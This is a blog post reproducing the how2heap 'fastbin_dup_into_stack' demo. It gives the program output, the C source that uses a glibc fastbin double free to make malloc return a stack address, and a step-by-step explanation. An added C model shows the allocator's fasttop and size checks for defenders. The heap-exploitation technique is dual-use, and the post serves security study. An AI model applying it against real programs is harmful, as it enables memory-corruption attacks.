
how2heap-fastbin_dup_into_stack

by sonysame 2018. 2. 18.

This file extends on fastbin_dup.c by tricking malloc into
returning a pointer to a controlled location (in this case, the stack).
The address we want malloc() to return is 0x7fff16112800.
Allocating 3 buffers.
1st malloc(8): 0x12d8010
2nd malloc(8): 0x12d8030
3rd malloc(8): 0x12d8050
Freeing the first one...
If we free 0x12d8010 again, things will crash because 0x12d8010 is at the top of the free list.
So, instead, we'll free 0x12d8030.
Now, we can free 0x12d8010 again, since it's not the head of the free list.
Now the free list has [ 0x12d8010, 0x12d8030, 0x12d8010 ]. We'll now carry out our attack by modifying data at 0x12d8010.
1st malloc(8): 0x12d8010
2nd malloc(8): 0x12d8030
Now the free list has [ 0x12d8010 ].
Now, we have access to 0x12d8010 while it remains at the head of the free list.
so now we are writing a fake free size (in this case, 0x20) to the stack,
so that malloc will think there is a free chunk there and agree to
return a pointer to it.
Now, we overwrite the first 8 bytes of the data at 0x12d8010 to point right before the 0x20.
3rd malloc(8): 0x12d8010, putting the stack address on the free list
4th malloc(8): 0x7fff16112800




#include <stdio.h>
#include <stdlib.h>

int main()
{
    fprintf(stderr, "This file extends on fastbin_dup.c by tricking malloc into\n"
        "returning a pointer to a controlled location (in this case, the stack).\n");

    unsigned long long stack_var;

    fprintf(stderr, "The address we want malloc() to return is %p.\n", 8+(char *)&stack_var);

    fprintf(stderr, "Allocating 3 buffers.\n");
    int *a = malloc(8);
    int *b = malloc(8);
    int *c = malloc(8);

    fprintf(stderr, "1st malloc(8): %p\n", a);
    fprintf(stderr, "2nd malloc(8): %p\n", b);
    fprintf(stderr, "3rd malloc(8): %p\n", c);

    fprintf(stderr, "Freeing the first one...\n");
    free(a);

    fprintf(stderr, "If we free %p again, things will crash because %p is at the top of the free list.\n", a, a);
    // free(a);

    fprintf(stderr, "So, instead, we'll free %p.\n", b);
    free(b);

    fprintf(stderr, "Now, we can free %p again, since it's not the head of the free list.\n", a);
    free(a);

    fprintf(stderr, "Now the free list has [ %p, %p, %p ]. "
        "We'll now carry out our attack by modifying data at %p.\n", a, b, a, a);

    unsigned long long *d = malloc(8);

    fprintf(stderr, "1st malloc(8): %p\n", d);
    fprintf(stderr, "2nd malloc(8): %p\n", malloc(8));
    fprintf(stderr, "Now the free list has [ %p ].\n", a);

    fprintf(stderr, "Now, we have access to %p while it remains at the head of the free list.\n"
        "so now we are writing a fake free size (in this case, 0x20) to the stack,\n"
        "so that malloc will think there is a free chunk there and agree to\n"
        "return a pointer to it.\n", a);
    stack_var = 0x20;

    fprintf(stderr, "Now, we overwrite the first 8 bytes of the data at %p to point right before the 0x20.\n", a);
    // a's first 8 bytes are its fd link while it sits in the fastbin; point it 8 bytes before stack_var,
    // so that stack_var itself sits where the fake chunk's size field is read from
    *d = (unsigned long long) (((char*)&stack_var) - sizeof(d));

    fprintf(stderr, "3rd malloc(8): %p, putting the stack address on the free list\n", malloc(8));
    fprintf(stderr, "4th malloc(8): %p\n", malloc(8));
}


a: malloc(8)

b: malloc(8)

c: malloc(8)


free(a)

free(b) // We cannot call free(a) right away, because a is at the top of the free list. If we did free(a), a would be put into the fastbin again, and its fd would then point to a itself: a -> a -> a -> ... an endless cycle.

free(a) // Now this works, because b is at the top of the free list. The fastbin now reads a -> b -> a.

malloc(8) -> a, at the top of the free list, is allocated. The fastbin now holds b -> a.

malloc(8) -> b, at the top of the free list, is allocated. Now only a remains in the fastbin.

Write a stack address into a's fd, and store a size at that stack address + 8.

The fastbin is then seen as a -> stack address.

Therefore:

malloc(8) -> a, at the top of the free list, is allocated. Now only the stack address remains in the fastbin.

malloc(8) -> the stack address, at the top of the free list, is allocated.

c is not actually needed.

In summary, for the fastbin:

malloc a -> malloc b -> free(a) -> free(b) -> free(a) -> malloc -> malloc -> set a's fd to the stack location and write the size -> malloc -> malloc (this is the allocation that returns the stack region)
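To make clear which allocator checks the sequence above runs into and which one it has to satisfy, here is an added C model of a single glibc fastbin. This is example code written for this note, not glibc source and not part of how2heap. It implements the two integrity checks the program output alludes to: the fasttop check, which is why an immediate second free(a) "crashes" with "double free or corruption (fasttop)", and the size-index check on malloc, which is the reason the fake stack chunk needs a 0x20 size word and is refused otherwise ("malloc(): memory corruption (fast)"). The struct names, function names and status codes are assumptions of the model; the 0x20 bin size and the a/b/stack sequence are the ones the post uses.

```c
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>

/* Toy model of one glibc fastbin (assumption: written for this note, not
 * glibc code). A chunk is an 8-byte size word followed by user data, and
 * the fd link overlays the first data word, which is the layout the
 * sequence above depends on. */
struct chunk {
    uint64_t size;   /* chunk size; the low 3 bits are flag bits in glibc */
    uint64_t fd;     /* next chunk in the bin while this chunk is free */
};

enum status { ST_OK = 0, ST_DOUBLE_FREE_TOP = 1, ST_BAD_SIZE = 2 };

#define BIN_SIZE 0x20u   /* this bin only serves chunks whose size field is 0x20 */

struct fastbin { struct chunk *top; };

/* Mirrors glibc's "double free or corruption (fasttop)" check: a chunk that
 * is already at the head of the bin may not be freed again. */
static enum status model_free(struct fastbin *bin, struct chunk *c)
{
    if (bin->top == c)
        return ST_DOUBLE_FREE_TOP;
    c->fd = (uint64_t)(uintptr_t)bin->top;
    bin->top = c;
    return ST_OK;
}

/* Mirrors glibc's "malloc(): memory corruption (fast)" check: the chunk
 * about to be handed out must carry the size that belongs to this bin
 * (flag bits masked off, as chunksize() does). */
static enum status model_malloc(struct fastbin *bin, struct chunk **out)
{
    struct chunk *victim = bin->top;
    *out = NULL;
    if (victim == NULL)
        return ST_OK;                        /* empty bin: nothing to hand out */
    if ((victim->size & ~(uint64_t)0x7) != BIN_SIZE)
        return ST_BAD_SIZE;
    bin->top = (struct chunk *)(uintptr_t)victim->fd;
    *out = victim;                           /* user data would start at &victim->fd */
    return ST_OK;
}

/* free(a); free(a): the second free is caught by the fasttop check. */
int immediate_double_free_is_rejected(void)
{
    struct chunk a = { BIN_SIZE, 0 };
    struct fastbin bin = { NULL };
    model_free(&bin, &a);
    return model_free(&bin, &a) == ST_DOUBLE_FREE_TOP;
}

/* free(a); free(b); free(a): every call passes the check and the bin then
 * reads a -> b -> a, the state the post describes. */
int interleaved_double_free_is_accepted(void)
{
    struct chunk a = { BIN_SIZE, 0 }, b = { BIN_SIZE, 0 };
    struct fastbin bin = { NULL };
    if (model_free(&bin, &a) != ST_OK) return 0;
    if (model_free(&bin, &b) != ST_OK) return 0;
    if (model_free(&bin, &a) != ST_OK) return 0;
    return bin.top == &a
        && (struct chunk *)(uintptr_t)a.fd == &b
        && (struct chunk *)(uintptr_t)b.fd == &a;
}

/* Continues from a -> b -> a: two mallocs leave a at the head while it is
 * also writable, a's fd is pointed at a fake chunk whose size word is
 * fake_size (this plays the role of stack_var), and the status of the final
 * malloc shows whether the size check accepts or refuses that chunk. */
enum status fake_chunk_passes_size_check(uint64_t fake_size)
{
    struct chunk a = { BIN_SIZE, 0 }, b = { BIN_SIZE, 0 };
    struct chunk fake = { fake_size, 0 };    /* constructed stand-in for the stack variable */
    struct fastbin bin = { NULL };
    struct chunk *d, *tmp;

    model_free(&bin, &a);
    model_free(&bin, &b);
    model_free(&bin, &a);
    model_malloc(&bin, &d);                  /* d == &a, and a is still linked in the bin */
    model_malloc(&bin, &tmp);                /* hands out b; a is back at the head */
    d->fd = (uint64_t)(uintptr_t)&fake;      /* the fd overwrite from the post */
    model_malloc(&bin, &tmp);                /* hands out a; fake is now at the head */
    return model_malloc(&bin, &tmp);         /* passes only if fake.size matches the bin */
}

int main(void)
{
    printf("free(a); free(a) rejected: %d\n", immediate_double_free_is_rejected());
    printf("free(a); free(b); free(a) accepted: %d\n", interleaved_double_free_is_accepted());
    printf("fake size 0x20 -> status %d\n", fake_chunk_passes_size_check(0x20));
    printf("fake size 0x30 -> status %d\n", fake_chunk_passes_size_check(0x30));
    return 0;
}
```

Build with any C compiler and run it: a fake chunk whose size word is 0x30 comes back as ST_BAD_SIZE, the model's equivalent of glibc aborting, while 0x20 (or 0x21, because the low flag bits are masked) is handed out. The point for a defender is that both checks are cheap but narrow: the fasttop check only compares against the head of the bin, and the size check only asks for a plausible size word, which is exactly the gap the post's sequence walks through. Newer glibc versions put tcache in front of the fastbins with its own key-based double-free detection, so the same program behaves differently there.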
